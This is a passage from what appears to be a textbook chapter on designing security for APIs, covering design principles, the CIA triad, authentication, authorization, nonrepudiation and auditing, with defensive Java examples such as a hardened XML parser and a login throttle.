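        if (granted != null) {
            granted.remove(permission);
        }
        cache.remove(subject); // never keep serving a stale decision
    }

    boolean check(String subject, String permission) {
        Set<String> effective = cache.computeIfAbsent(subject,
                s -> Set.copyOf(policyStore.getOrDefault(s, Set.of())));
        return effective.contains(permission);
    }

    public static void main(String[] args) {
        MediatedAccessChecker checker = new MediatedAccessChecker();
        checker.grant("alice", "file:read");
        System.out.println(checker.check("alice", "file:read")); // true
        checker.revoke("alice", "file:read");
        System.out.println(checker.check("alice", "file:read")); // false, immediately
    }
}
```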
NIST (National Institute of Standards and Technology, United States) followed an open process, which expanded from 1997 to 2000 to pick the best cryptographically strong algorithm for AES, to replace DES (Data Encryption Standard), which by then was susceptible to brute-force attacks. On January 2, 1997, the initial announcement was made by NIST regarding the competition to build an algorithm to replace DES. During the first nine months, after the competition began, there were 15 different proposals from several countries. All the designs were open, and each one of them was subjected to thorough cryptanalysis. NIST also held two open conferences to discuss the proposals, Chapter 2 Designing seCurity for apis 50 in August 1998 and March 1999, and then narrowed down all 15 proposals into 5. After another round of intense analysis during the April 2000 AES conference, the winner was announced in October 2000, and they picked Rijndael as the AES algorithm. More than the final outcome, everyone (even the losers of the competition) appreciated NIST for the open process they carried throughout the AES selection phase. The open design principle further highlights that the architects or developers of a particular application should not rely on the design or coding secrets of the application to make it secure. If you rely on open source software, then this is not even possible at all. There are no secrets in open source development. Under the open source philosophy from the design decisions to feature development, all happens openly. One can easily argue, due to the exact same reason, open source software is bad in security. This is a very popular argument against open source software, but facts prove otherwise. According to a report28 by Netcraft published in January 2015, almost 51% of all active sites in the Internet are hosted on web servers powered by the open source Apache web server. The OpenSSL library, which is another open source project implementing the SSL (Secure Sockets Layer) and TLS (Transport Layer Security) protocols, is used by more than 5.5 million web sites in the Internet, by November 2015.29 If anyone seriously worries about the security aspects of open source, it’s highly recommended for him or her to read the white paper published by SANS Institute, under the topic Security Concerns in Using Open Source Software for Enterprise Requirements.30 Note gartner predicts, by 2020, 98% of it organizations will leverage open source software technology in their mission-critical it portfolios, including many cases where they will be unaware of it.31 28 Netcraft January 2015 Web Server Survey, http://news.netcraft.com/archives/2015/01/15/ january-2015-web-server-survey.html 29 OpenSSL Usage Statistics, http://trends.builtwith.com/Server/OpenSSL 30 Security Concerns in Using Open Source Software for Enterprise Requirements, www.sans.org/ reading-room/whitepapers/awareness/security-concerns-open-source-software- enterprise-requirements-1305 31 Middleware Technologies—Enabling Digital Business, www.gartner.com/doc/3163926/ hightech-tuesday-webinar-middleware-technologies Chapter 2 Designing seCurity for apis 51 Separation of Privilege The principle of separation of privilege states that a system should not grant permissions based on a single condition. The same principle is also known as segregation of duties, and one can look into it from multiple aspects. For example, say a reimbursement claim can be submitted by any employee but can only be approved by the manager. 
What if the manager wants to submit a reimbursement? According to the principle of separation of privilege, the manager should not be granted the right to approve his or her own reimbursement claims. It is interesting to see how Amazon follows the separation of privilege principle in securing AWS (Amazon Web Services) infrastructure. According to the security white paper32 published by Amazon, the AWS production network is segregated from the Amazon Corporate network by means of a complex set of network security/segregation devices. AWS developers and administrators on the corporate network who need to access AWS cloud components in order to maintain them must explicitly request access through the AWS ticketing system. All requests are reviewed and approved by the applicable service owner. Approved AWS personnel then connect to the AWS network through a bastion host that restricts access to network devices and other cloud components, logging all activity for security review. Access to bastion hosts require SSH public key authentication for all user accounts on the host. NSA (National Security Agency, United States) too follows a similar strategy. In a fact sheet33 published by NSA, it highlights the importance of implementing the separation of privilege principle at the network level. Networks are composed of interconnected devices with varying functions, purposes, and sensitivity levels. Networks can consist of multiple segments that may include web servers, database servers, development environments, and the infrastructure that binds them together. Because these segments have different purposes as well as different security concerns, segregating them appropriately is paramount in securing a network from exploitation and malicious intent. 32 AWS security white paper, https://d0.awsstatic.com/whitepapers/aws-security- whitepaper.pdf 33 Segregating networks and functions, www.nsa.gov/ia/_files/factsheets/I43V_Slick_ Sheets/Slicksheet_SegregatingNetworksAndFunctions_Web.pdf Chapter 2 Designing seCurity for apis 52 Least Common Mechanism The principle of least common mechanism concerns the risk of sharing state information among different components. In other words, it says that mechanisms used to access resources should not be shared. This principle can be interpreted in multiple angles. One good example is to see how Amazon Web Services (AWS) works as an infrastructure as a service (IaaS) provider. Elastic Compute Cloud, or EC2, is one of the key services provided by AWS. Netflix, Reddit, Newsweek, and many other companies run their services on EC2. EC2 provides a cloud environment to spin up and down server instances of your choice based on the load you get. With this approach, you do not need to plan before for the highest expected load and let the resources idle most of the time when there is low load. Even though in this case, each EC2 user gets his own isolated server instance running its own guest operating system (Linux, Windows, etc.), ultimately all the servers are running on top of a shared platform maintained by AWS. This shared platform includes a networking infrastructure, a hardware infrastructure, and storage. On top of the infrastructure, there runs a special software called hypervisor. All the guest operating systems are running on top of the hypervisor. Hypervisor provides a virtualized environment over the hardware infrastructure. Xen and KVM are two popular hypervisors, and AWS is using Xen internally. 
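Stepping back to the reimbursement example that opened this section, the separation of privilege rule is straightforward to enforce in code: approval depends on more than one condition, and in particular it rejects an approver who is also the submitter. The claim structure and the role name below are hypothetical.

```java
import java.util.Set;

public class ClaimApprovalService {

    record Claim(String id, String submittedBy) {}

    // Approval requires two independent conditions: the approver must hold the
    // manager role, and the approver must not be the person who submitted the claim.
    static boolean canApprove(Claim claim, String approver, Set<String> approverRoles) {
        boolean isManager = approverRoles.contains("manager");
        boolean isNotSubmitter = !approver.equals(claim.submittedBy());
        return isManager && isNotSubmitter;
    }

    public static void main(String[] args) {
        Claim claim = new Claim("exp-42", "carol");
        System.out.println(canApprove(claim, "carol", Set.of("manager"))); // false: own claim
        System.out.println(canApprove(claim, "dave", Set.of("manager")));  // true
    }
}
```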
Even though a given virtual server instance running for one customer does not have access to another virtual server instance running for another customer, if someone can find a security hole in the hypervisor, then he can get the control of all the virtual server instances running on EC2. Even though this sounds like nearly impossible, in the past there were many security vulnerabilities reported against the Xen hypervisor.34 The principle of least common mechanism encourages minimizing common, shared usage of resources. Even though the usage of common infrastructure cannot be completely eliminated, its usage can be minimized based on business requirements. AWS Virtual Private Cloud (VPC) provides a logically isolated infrastructure for each of its users. Optionally, one can also select to launch dedicated instances, which run on hardware dedicated to each customer for additional isolation. The principle of least common mechanism can also be applied to a scenario where you store and manage data in a shared multitenanted environment. If we follow the strategy shared everything, then the data from different customers can be stored in 34 Xen Security Advisories, http://xenbits.xen.org/xsa/ Chapter 2 Designing seCurity for apis 53 the same table of the same database, isolating each customer data by the customer id. The application, which accesses the database, will make sure that a given customer can only access his own data. With this approach, if someone finds a security hole in the application logic, he can access all customer data. The other approach could be to have an isolated database for each customer. This is a more expensive but much secure option. With this we can minimize what is being shared between customers. Psychological Acceptability The principle of psychological acceptability states that security mechanisms should not make the resource more difficult to access than if the security mechanisms were not present. Accessibility to resources should not be made difficult by security mechanisms. If security mechanisms kill the usability or accessibility of resources, then users may find ways to turn off those mechanisms. Wherever possible, security mechanisms should be transparent to the users of the system or at most introduce minimal distractions. Security mechanisms should be user-friendly to encourage the users to occupy them more frequently. Microsoft introduced information cards in 2005 as a new paradigm for authentication to fight against phishing. But the user experience was bad, with a high setup cost, for people who were used to username/password-based authentication. It went down in history as another unsuccessful initiative from Microsoft. Most of the web sites out there use CAPTCHA as a way to differentiate human beings from automated scripts. CAPTCHA is in fact an acronym, which stands for Completely Automated Public Turing test to tell Computers and Humans Apart. CAPTCHA is based on a challenge-response model and mostly used along with user registration and password recovery functions to avoid any automated brute-force attacks. Even though this tightens up security, this also could easily kill the user experience. Some of the challenges provided by certain CAPTCHA implementations are not even readable to humans. Google tries to address this concern with Google reCAPTCHA.35 With reCAPTCHA users can attest they are humans without having to solve a CAPTCHA. Instead, with just a single click, one can confirm that he is not a robot. 
This is also known as No CAPTCHA reCAPTCHA experience. 35 Google reCAPTCHA, www.google.com/recaptcha/intro/index.html Chapter 2 Designing seCurity for apis 54 Security Triad Confidentiality, integrity, and availability (CIA), widely known as the triad of information security, are three key factors used in benchmarking information systems security. This is also known as CIA triad or AIC triad. The CIA triad helps in both designing a security model and assessing the strength of an existing security model. In the following sections, we discuss the three key attributes of the CIA triad in detail. Confidentiality Confidentiality attribute of the CIA triad worries about how to protect data from unintended recipients, both at rest and in transit. You achieve confidentiality by protecting transport channels and storage with encryption. For APIs, where the transport channel is HTTP (most of the time), you can use Transport Layer Security (TLS), which is in fact known as HTTPS. For storage, you can use disk-level encryption or application- level encryption. Channel encryption or transport-level encryption only protects a message while it’s in transit. As soon as the message leaves the transport channel, it’s no more secure. In other words, transport-level encryption only provides point-to-point protection and truncates from where the connection ends. In contrast, there is message- level encryption, which happens at the application level and has no dependency on the transport channel. In other words, with message-level encryption, the application itself has to worry about how to encrypt the message, prior to sending it over the wire, and it’s also known as end-to-end encryption. If you secure data with message-level encryption, then you can use even an insecure channel (like HTTP) to transport the message. A TLS connection, when going through a proxy, from the client to the server can be established in two ways: either with TLS bridging or with TLS tunneling. Almost all proxy servers support both modes. For a highly secured deployment, TLS tunneling is recommended. In TLS bridging, the initial connection truncates from the proxy server, and a new connection to the gateway (or the server) is established from there. That means the data is in cleartext while inside the proxy server. Any intruder who can plant malware in the proxy server can intercept traffic that passes through. With TLS tunneling, the proxy server facilitates creating a direct channel between the client machine and the gateway (or the server). The data flow through this channel is invisible to the proxy server. Message-level encryption, on the other hand, is independent from the underlying transport. It’s the application developers’ responsibility to encrypt and decrypt messages. Because this is application specific, it hurts interoperability and builds tight Chapter 2 Designing seCurity for apis 55 couplings between the sender and the receiver. Each has to know how to encrypt/ decrypt data beforehand—which will not scale well in a largely distributed system. To overcome this challenge, there have been some concentrated efforts to build standards around message-level security. XML Encryption is one such effort, led by the W3C. It standardizes how to encrypt an XML payload. Similarly, the IETF JavaScript Object Signing and Encryption (JOSE) working group has built a set of standards for JSON payloads. 
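To illustrate the basic idea behind message-level protection, the following simplified sketch encrypts a JSON payload with AES-GCM using the JDK's Cipher API before it is handed to any channel. This is not JSON Web Encryption; it deliberately skips key distribution, headers, and the other concerns a real standard covers, and the payload is a made-up example. The point is only that the protection travels with the message rather than with the connection.

```java
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

public class MessageLevelEncryptionDemo {
    public static void main(String[] args) throws Exception {
        String payload = "{\"amount\":100,\"currency\":\"USD\"}";

        // In a real system the key would be shared with or wrapped for the recipient;
        // here it is generated locally just to demonstrate the mechanics.
        KeyGenerator keyGen = KeyGenerator.getInstance("AES");
        keyGen.init(256);
        SecretKey key = keyGen.generateKey();

        byte[] iv = new byte[12];              // 96-bit nonce, as recommended for GCM
        new SecureRandom().nextBytes(iv);

        Cipher encrypt = Cipher.getInstance("AES/GCM/NoPadding");
        encrypt.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv));
        byte[] ciphertext = encrypt.doFinal(payload.getBytes(StandardCharsets.UTF_8));

        // The encrypted message can now cross any transport, even plain HTTP,
        // without exposing the payload to intermediaries such as proxies.
        System.out.println(Base64.getEncoder().encodeToString(ciphertext));

        Cipher decrypt = Cipher.getInstance("AES/GCM/NoPadding");
        decrypt.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv));
        System.out.println(new String(decrypt.doFinal(ciphertext), StandardCharsets.UTF_8));
    }
}
```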
In Chapters 7 and 8, we discuss JSON Web Signature and JSON Web Encryption, respectively—which are two prominent standards in securing JSON messages. Note secure sockets Layer (ssL) and transport Layer security (tLs) are often used interchangeably, but in pure technical terms, they aren’t the same. tLs is the successor of ssL 3.0. tLs 1.0, which is defined under the ietf rfC 2246, is based on the ssL 3.0 protocol specification, which was published by netscape. the differences between tLs 1.0 and ssL 3.0 aren’t dramatic, but they’re significant enough that tLs 1.0 and ssL 3.0 don’t interoperate. There are few more key differences between transport-level security and message- level security, in addition to what were discussed before. • Transport-level security being point to point, it encrypts the entire message while in transit. • Since transport-level relies on the underlying channel for protection, application developers have no control over which part of the data to encrypt and which part not to. • Partial encryption isn’t supported by transport-level security, but it is supported by message-level security. • Performance is a key factor, which differentiates message-level security from transport-level security. Message-level encryption is far more expensive than transport-level encryption, in terms of resource consumption. Chapter 2 Designing seCurity for apis 56 • Message-level encryption happens at the application layer, and it has to take into consideration the type and the structure of the message to carry out the encryption process. If it’s an XML message, then the process defined in the XML Encryption standard has to be followed. Integrity Integrity is a guarantee of data’s correctness and trustworthiness and the ability to detect any unauthorized modifications. It ensures that data is protected from unauthorized or unintentional alteration, modification, or deletion. The way to achieve integrity is twofold: preventive measures and detective measures. Both measures have to take care of data in transit as well as data at rest. To prevent data from alteration while in transit, you should use a secure channel that only intended parties can read or do message-level encryption. TLS (Transport Layer Security) is the recommended approach for transport-level encryption. TLS itself has a way of detecting data modifications. It sends a message authentication code in each message from the first handshake, which can be verified by the receiving party to make sure the data has not been modified while in transit. If you use message-level encryption to prevent data alteration, then to detect any modification in the message at the recipient, the sender has to sign the message, and with the public key of the sender, the recipient can verify the signature. Similar to what we discussed in the previous section, there are standards based on the message type and the structure, which define the process of signing. If it’s an XML message, then the XML Signature standard by W3C defines the process. For data at rest, you can calculate the message digest periodically and keep it in a secured place. The audit logs, which can be altered by an intruder to hide suspicious activities, need to be protected for integrity. Also with the advent of network storage and new technology trends, which have resulted in new failure modes for storage, interesting challenges arise in ensuring data integrity. A paper36 published by Gopalan Sivathanu, Charles P. 
Wright, and Erez Zadok of Stony Brook University highlights the causes of integrity violations in storage and presents a survey of integrity assurance techniques that exist today. It describes several interesting applications of storage integrity checking, apart from security, and discusses the implementation issues associated with those techniques. 36 Ensuring Data Integrity in Storage: Techniques and Applications, www.fsl.cs.sunysb.edu/ docs/integrity-storagess05/integrity.html Chapter 2 Designing seCurity for apis 57 Note http Digest authentication with the quality of protection (qop) value set to auth-int can be used to protect messages for integrity. appendix f discusses http Digest authentication in depth. Availability Making a system available for legitimate users to access all the time is the ultimate goal of any system design. Security isn’t the only aspect to look into, but it plays a major role in keeping the system up and running. The goal of the security design should be to make the system highly available by protecting it from illegal access attempts. Doing so is extremely challenging. Attacks, especially on a public API, can vary from an attacker planting malware in the system to a highly organized distributed denial of service (DDoS) attack. DDoS attacks are hard to eliminate fully, but with a careful design, they can be minimized to reduce their impact. In most cases, DDoS attacks must be detected at the network perimeter level—so, the application code doesn’t need to worry too much. But vulnerabilities in the application code can be exploited to bring a system down. A paper37 published by Christian Mainka, Juraj Somorovsky, Jorg Schwenk, and Andreas Falkenberg discusses eight types of DoS attacks that can be carried out against SOAP- based APIs with XML payloads: • Coercive parsing attack: The attacker sends an XML document with a deeply nested XML structure. When a DOM-based parser processes the XML document, an out-of-memory exception or a high CPU load can occur. • SOAP array attack: Forces the attacked web service to declare a very large SOAP array. This can exhaust the web service’s memory. • XML element count attack: Attacks the server by sending a SOAP message with a high number of non-nested elements. 37 A New Approach towards DoS Penetration Testing on Web Services, www.nds.rub.de/media/ nds/veroeffentlichungen/2013/07/19/ICWS_DoS.pdf Chapter 2 Designing seCurity for apis 58 • XML attribute count attack: Attacks the server by sending a SOAP message with a high attribute count. • XML entity expansion attack: Causes a system failure by forcing the server to recursively resolve entities defined in a document type definition (DTD). This attack is also known as an XML bomb or a billion laughs attack. • XML external entity DoS attack: Causes a system failure by forcing the server to resolve a large external entity defined in a DTD. If an attacker is able to execute the external entity attack, an additional attack surface may appear. • XML overlong name attack: Injects overlong XML nodes in the XML document. Overlong nodes can be overlong element names, attribute names, attribute values, or namespace definitions. • Hash collision attack (HashDoS): Different keys result in the same bucket assignments, causing a collision. A collision leads to resource- intensive computations in the bucket. When a weak hash function is used, an attacker can intentionally create hash collisions that lead to a system failure. Most of these attacks can be prevented at the application level. 
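Several of the XML-based attacks above rely on the parser resolving DTDs and expanding entities, so one practical first step is to lock the parser down before any request payload is touched. The sketch below configures a JAXP DocumentBuilderFactory, as shipped with the JDK, that way; the feature URIs are the ones recognized by the JDK's built-in Xerces-based parser, and other parser implementations may need different settings.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class HardenedXmlParserFactory {

    static DocumentBuilderFactory newHardenedFactory() throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Reject any document carrying a DOCTYPE declaration, which shuts the door on
        // entity expansion (billion laughs) and external entity attacks in one move.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces: also disable external entities and entity expansion.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setExpandEntityReferences(false);
        factory.setXIncludeAware(false);
        return factory;
    }

    public static void main(String[] args) throws Exception {
        DocumentBuilder builder = newHardenedFactory().newDocumentBuilder();
        Document doc = builder.parse(new ByteArrayInputStream(
                "<order><id>1</id></order>".getBytes(StandardCharsets.UTF_8)));
        System.out.println(doc.getDocumentElement().getTagName()); // prints: order
    }
}
```

With this configuration, a payload that carries a DOCTYPE is rejected at parse time instead of being expanded into gigabytes of memory.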
For CPU- or memory- intensive operations, you can keep threshold values. For example, to prevent a coercive parsing attack, the XML parser can enforce a limit on the number of elements. Similarly, if your application executes a thread for a longer time, you can set a threshold and kill it. Aborting any further processing of a message as soon as it’s found to be not legitimate is the best way to fight against DoS attacks. This also highlights the importance of having authentication/authorization checks closest to the entry point of the flow. Note according to esecurity planet, one of the largest DDos attacks hit the internet in March 2013 and targeted the Cloudflare network with 120 gbps. the upstream providers were hit by 300 gbps DDos at the peak of the attack. Chapter 2 Designing seCurity for apis 59 There are also DoS attacks carried out against JSON vulnerabilities. CVE-2013-026938 explains a scenario in which a carefully crafted JSON message can be used to trigger the creation of arbitrary Ruby symbols or certain internal objects, to result in a DoS attack. Security Control The CIA triad (confidentiality, integrity, and availability), which we discussed in detail in the previous section of this chapter, is one of the core principles of information security. In achieving CIA, authentication, authorization, nonrepudiation, and auditing are four prominent controls, which play a vital role. In the following sections, we discuss these four security controls in detail. Authentication Authentication is the process of identifying a user, a system, or a thing in a unique manner to prove that it is the one who it claims to be. Authentication can be direct or brokered, based on how you bring your authentication assertions. If you directly log in to a system just providing your username and password, it falls under direct authentication. In other words, under direct authentication, the entity which wants to authenticate itself presents the authentication assertions to the service it wants to access. Under brokered authentication, there is a third party involved. This third party is commonly known as an identity provider. When you log in to your Yelp account via Facebook, it falls under brokered authentication, and Facebook is the identity provider. With brokered authentication, the service provider (or the website you want to log in, or the API you want to access) does not trust you directly. It only trusts an identity provider. You can access the service only if the trusted identity provider (by the service provider) passes a positive assertion to the service provider. Authentication can be done in a single factor or in multiple factors (also known as multifactor authentication). Something you know, something you are, and something you have are the well-known three factors of authentication. For multifactor authentication, a system should use a combination of at least two factors. Combining two techniques 38 CVE-2013-0269, https://nvd.nist.gov/vuln/detail/CVE-2013-0269 Chapter 2 Designing seCurity for apis 60 that fall under the same category isn’t considered multifactor authentication. For example, entering a username and a password and then a PIN number isn’t considered multifactor authentication, because both fall under the something you know category. Note google two-step verification falls under multifactor authentication. first you need to provide a username and a password (something you know), and then a pin is sent to your mobile phone. 
Knowing the pin verifies that the registered mobile phone is under your possession: it’s something you have. then again one can argue this is not multifactor authentication, because you only need to know the pin, having the phone with you to get the pin is not mandatory. this sounds bit weird, but grant Blakeman’s incident proved exactly the same thing.39 an attacker was able to set a call forwarding number into grant’s cell phone and was able to receive google password reset information to the new number (via call forwarding). Something You Know Passwords, passphrases, and PIN numbers belong to the category of something you know. This has been the most popular form of authentication not just for decades but also for centuries. It goes back to the eighteenth century. In the Arabian folktale Ali Baba and the Forty Thieves from One Thousand and One Nights, Ali Baba uses the passphrase “open sesame” to open the door to a hidden cave. Since then, this has become the most popular form of authentication. Unfortunately, it’s also the weakest form of authentication. Password-protected systems can be broken in several ways. Going back to Ali Baba’s story, his brother-in-law got stuck in the same cave without knowing the password and tried shouting all the words he knew. This, in modern days, is known as a brute-force attack. The first known brute-force attack took place in the 18th century. Since then, it has become a popular way of breaking password-secured systems. 39 The value of a name, https://ello.co/gb/post/knOWk-qeTqfSpJ6f8-arCQ Chapter 2 Designing seCurity for apis 61 Note in april 2013, Wordpress was hit with a brute-force attack of massive scale. the average scans per day in april were more than 100,000.40 there are different forms of brute-force attacks. the dictionary attack is one of them, where the brute-force attack is carried out with a limited set of inputs based on a dictionary of commonly used words. this is why you should have a corporate password policy that should enforce strong passwords with mixed alphanumeric characters that aren’t found in dictionaries. Most public web sites enforce a CaptCha after few failed login attempts. this makes automated/tool-based brute-force attacks harder to execute. Something You Have Certificates and smart card–based authentication fall into the category of something you have. This is a much stronger form of authentication than something you know. TLS mutual authentication is the most popular way of securing APIs with client certificates; this is covered in detail in Chapter 3. FIDO (Fast IDentity Online) authentication also falls under the something you have category. FIDO alliance41 has published three open specifications to address certain concerns in strong authentication: FIDO Universal Second Factor (FIDO U2F), FIDO Universal Authentication Framework (FIDO UAF) and the Client to Authenticator Protocol (CTAP). FIDO U2F protocol allows online services to augment the security of their existing password infrastructure by adding a strong second factor to user login. The largest deployment of FIDO U2F–based authentication is at Google. 
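One common application-level defense against the brute-force attacks described above is to throttle or lock an account after a small number of consecutive failures. The sketch below keeps an in-memory failure counter with a lockout window; in a real deployment the counters would live in a shared store so that all server instances see them, and the thresholds shown here are arbitrary.

```java
import java.time.Duration;
import java.time.Instant;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

public class LoginThrottle {

    private static final int MAX_FAILURES = 5;
    private static final Duration LOCKOUT = Duration.ofMinutes(15);

    private record State(int failures, Instant lockedUntil) {}

    private final Map<String, State> states = new ConcurrentHashMap<>();

    // Check this before even evaluating the supplied password.
    boolean isLocked(String username) {
        State state = states.get(username);
        return state != null && state.lockedUntil() != null
                && Instant.now().isBefore(state.lockedUntil());
    }

    void recordFailure(String username) {
        states.merge(username, new State(1, null), (old, ignored) -> {
            int failures = old.failures() + 1;
            Instant lockedUntil = failures >= MAX_FAILURES ? Instant.now().plus(LOCKOUT) : null;
            return new State(failures, lockedUntil);
        });
    }

    void recordSuccess(String username) {
        states.remove(username); // a successful login resets the counter
    }

    public static void main(String[] args) {
        LoginThrottle throttle = new LoginThrottle();
        for (int i = 0; i < 5; i++) throttle.recordFailure("alice");
        System.out.println(throttle.isLocked("alice")); // true
    }
}
```

The same idea, combined with a CAPTCHA after a few failures, is what makes automated guessing expensive without punishing a legitimate user who mistypes a password once or twice.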
Google has been using FIDO U2F internally for some time to secure its internal services, and in October 2014 Google made FIDO U2F enabled to all its users publicly.42 40 The WordPress Brute Force Attack Timeline, http://blog.sucuri.net/2013/04/the- wordpress-brute-force-attack-timeline.html 41 FIDO Alliance, https://fidoalliance.org/specifications/overview/ 42 Strengthening 2-Step Verification with Security Key, https://googleonlinesecurity. blogspot.com/2014/10/strengthening-2-step-verification-with.html Chapter 2 Designing seCurity for apis 62 Something You Are Fingerprints, eye retina, facial recognition, and all other biometric-based authentication techniques fall into the category of something you are. This is the strongest form of authentication. In most of the cases, biometric authentication is not done on its own, rather used with another factor to further improve the security. With the wide adoption of mobile devices, most of the retailers, financial institutes, and many others have chosen fingerprint-based authentication for their mobile apps. In the iOS platform, all these applications associate their username- and password-based authentication with Apple Touch ID (or face recognition). Once the initial association is done, a user can log in to all the associated applications just by scanning his fingerprint. Further iPhone also associates Touch ID with App Store login and to authorize Apple Pay transactions. Authorization Authorization is the process of validating what actions an authenticated user, a system, or a thing can perform within a well-defined system boundary. Authorization happens with the assumption that the user is already authenticated. Discretionary Access Control (DAC) and Mandatory Access Control (MAC) are two prominent models to control access in a system. With Discretionary Access Control (DAC), the user who owns the data, at their discretion, can transfer rights to another user. Most operating systems support DAC, including Unix, Linux, and Windows. When you create a file in Linux, you can decide who should be able to read, write to, and execute it. Nothing prevents you from sharing it with any user or a group of users. There is no centralized control—which can easily bring security flaws into the system. With Mandatory Access Control (MAC), only designated users are allowed to grant rights. Once rights are granted, users can’t transfer them. SELinux, Trusted Solaris, and TrustedBSD are some of the operating systems that support MAC. Chapter 2 Designing seCurity for apis 63 Note seLinux is an nsa research project that added the Mandatory access Control (MaC) architecture to the Linux kernel, which was then merged into the mainstream version of Linux in august 2003. it utilizes a Linux 2.6 kernel feature called the Linux security Modules (LsM) interface. The difference between DAC and MAC lies in who owns the right to delegate. In either case, you need to have a way to represent access control rules or the access matrix. Authorization tables, access control lists (see Figure 2-2), and capabilities are three ways of representing access control rules. An authorization table is a three-column table with subject, action, and resource. The subject can be an individual user or a group. With access control lists, each resource is associated with a list, indicating, for each subject, the actions that the subject can exercise on the resource. 
With capabilities, each subject has an associated list called a capability list, indicating, for each resource, the actions that the user is allowed to exercise on the resource. A bank locker key can be considered a capability: the locker is the resource, and the user holds the key to the resource. At the time the user tries to open the locker with the key, you only have to worry about the capabilities of the key—not the capabilities of its owner. An access control list is resource driven, whereas capabilities are subject driven.

Authorization tables, access control lists, and capabilities are very coarse grained. One alternative is to use policy-based access control. With policy-based access control, you can have authorization policies with fine granularity. In addition, capabilities and access control lists can be dynamically derived from policies. eXtensible Access Control Markup Language (XACML) is one of the OASIS standards for policy-based access control.

Figure 2-2. Access control list

Note XACML is an XML-based open standard for policy-based access control developed under the OASIS XACML Technical Committee. XACML 3.0, the latest XACML specification, was standardized in January 2013.43 Then again, however powerful it is, XACML is a little too complex for defining access control policies. You can also check the Open Policy Agent (OPA) project, which has recently become quite popular for building fine-grained access control policies.

Nonrepudiation

Whenever you do a business transaction via an API after proving your identity, you should not be able to reject or repudiate it later. The property that ensures the inability to repudiate is known as nonrepudiation. You do it once—you own it forever. Nonrepudiation should provide proof of the origin and the integrity of data, both in an unforgeable manner, which a third party can verify at any time. Once a transaction is initiated, none of its content—including the user identity, date and time, and transaction details—should be altered, so as to maintain the transaction integrity and allow future verifications. One has to ensure that the transaction is unaltered and logged after it's committed and confirmed. Logs must be archived and properly secured to prevent unauthorized modifications. Whenever there is a repudiation dispute, transaction logs along with other logs or data can be retrieved to verify the initiator, date and time, transaction history, and so on.

Note TLS ensures authentication (by verifying certificates), confidentiality (by encrypting the data with a secret key), and integrity (by digesting the data), but not nonrepudiation. In TLS, the Message Authentication Code (MAC) value of the transmitted data is calculated with a shared secret key, known to both the client and the server. Shared keys can't be used for nonrepudiation.

43 XACML 3.0 specification, http://docs.oasis-open.org/xacml/3.0/xacml-3.0-core-spec-os-en.pdf

Digital signatures provide a strong binding between the user (who initiates the transaction) and the transaction the user performs. A key known only to the user should sign the complete transaction, and the server (or the service) should be able to verify the signature through a trusted broker that vouches for the legitimacy of the user's key. This trusted broker can be a certificate authority (CA). Once the signature is verified, the server knows the identity of the user and can guarantee the integrity of the data.
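As a minimal illustration of that idea, the following sketch signs a transaction payload with a private key and verifies it with the corresponding public key, using the standard java.security APIs. The key pair is generated in place purely for the example; in a real nonrepudiation setup, the private key stays only with the user, and a certificate authority vouches for the public key.

import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.util.Base64;

public class TransactionSigningExample {

    public static void main(String[] args) throws Exception {
        // Generated here only for illustration; in practice the user already owns this key pair.
        KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
        generator.initialize(2048);
        KeyPair keyPair = generator.generateKeyPair();

        String transaction = "{\"order_id\":\"11\",\"amount\":\"250.00\",\"timestamp\":\"2019-10-02T15:22:31Z\"}";

        // The user signs the complete transaction with a key known only to them.
        Signature signer = Signature.getInstance("SHA256withRSA");
        signer.initSign(keyPair.getPrivate());
        signer.update(transaction.getBytes(StandardCharsets.UTF_8));
        byte[] signature = signer.sign();
        System.out.println("Signature: " + Base64.getEncoder().encodeToString(signature));

        // The server (or any third party) verifies the signature with the user's public key.
        Signature verifier = Signature.getInstance("SHA256withRSA");
        verifier.initVerify(keyPair.getPublic());
        verifier.update(transaction.getBytes(StandardCharsets.UTF_8));
        System.out.println("Signature valid: " + verifier.verify(signature));
    }
}

Because only the holder of the private key could have produced a signature that verifies against that public key, a third party can confirm the origin and the integrity of the archived transaction at any later time.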
For nonrepudiation purposes, the data must be stored securely for any future verification. Note the paper44 Non-Repudiation in Practice, by Chii-ren tsai of Citigroup, discusses two potential nonrepudiation architectures for financial transactions using challenge-response one-time password tokens and digital signatures. Auditing There are two aspects of auditing: keeping track of all legitimate access attempts to facilitate nonrepudiation, and keeping track of all illegal access attempts to identify possible threats. There can be cases where you’re permitted to access a resource, but it should be with a valid purpose. For example, a mobile operator is allowed to access a user’s call history, but he should not do so without a request from the corresponding user. If someone frequently accesses a user’s call history, you can detect it with proper audit trails. Audit trails also play a vital role in fraud detection. An administrator can define fraud-detection patterns, and the audit logs can be evaluated in near real time to find any matches. Summary • Security isn’t an afterthought. It has to be an integral part of any development project and also for APIs. It starts with requirements gathering and proceeds through the design, development, testing, deployment, and monitoring phases. 44 Non-Repudiation in Practice, www.researchgate.net/publication/240926842_ Non-Repudiation_In_Practice Chapter 2 Designing seCurity for apis 66 • Connectivity, extensibility, and complexity are the three trends behind the rise of data breaches around the globe in the last few years. • The most challenging thing in any security design is to find and maintain the right balance between security and the user comfort. • A proper security design should care about all the communication links in the system. Any system is no stronger than its weakest link. • A layered approach is preferred for any system being tightened for security. This is also known as defense in depth. • Insider attacks are less complicated, but highly effective. • Kerckhoffs’ principle emphasizes that a system should be secured by its design, not because the design is unknown to an adversary. • The principle of least privilege states that an entity should only have the required set of permissions to perform the actions for which they are authorized, and no more. • The fail-safe defaults principle highlights the importance of making a system safe by default. • The economy of mechanism principle highlights the value of simplicity. The design should be as 